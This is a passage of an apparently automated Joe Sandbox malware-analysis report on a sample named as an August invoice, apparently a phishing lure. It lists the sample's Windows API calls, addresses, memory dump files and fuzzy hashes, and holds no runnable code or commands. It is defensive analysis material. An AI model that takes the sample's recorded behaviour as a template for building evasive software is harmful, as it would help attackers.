                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                          • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                          • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                          • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$LabelVolume
                                                          • String ID: \VH
                                                          • API String ID: 2006950084-234962358
                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                          • DrawMenuBar.USER32 ref: 00449761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                          • String ID: 0
                                                          • API String ID: 772068139-4108050209
                                                          • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                          • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$_wcscpy
                                                          • String ID: 3, 3, 8, 1
                                                          • API String ID: 3469035223-357260408
                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                          • API String ID: 2574300362-3530519716
                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                          • API String ID: 2574300362-275556492
                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                          • API String ID: 2574300362-58917771
                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                          APIs
                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                          • __itow.LIBCMT ref: 004699CD
                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                          • __itow.LIBCMT ref: 00469A97
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                          • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                          • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                          • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                          APIs
                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
